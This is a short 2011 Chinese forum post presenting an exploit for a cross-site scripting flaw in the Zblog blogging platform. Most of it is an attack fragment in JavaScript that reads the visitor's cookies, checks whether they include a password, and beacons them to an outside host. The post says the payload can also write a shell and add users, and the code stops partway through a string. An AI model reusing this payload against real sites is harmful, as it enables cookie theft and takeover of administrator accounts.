雪狼零售批发进口红酒 發表於 2011-3-11 11:59:33

Zblog最新跨站漏洞及利用代码

<p>  Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向 <br /><br />  xmlhttp=poster(); <br /><br />  cookie=document.cookie; <br /><br />  login=cookie.indexOf(&lsquo;password&rsquo;)==-1?0:1; <br /><br />  tolocation=&rsquo;https://www.jb51.net/&rsquo;; <br /><br />  //get cookie <br /><br />  x=new Image(); <br /><br />  x.src=&rdquo;www.dosjj.com/c.php?c=&rdquo;+escape(document.cookie); <br /><br />  //get a shell <br /><br />  data=&rdquo;txaContent= </p>
頁: [1]
查看完整版本: Zblog最新跨站漏洞及利用代码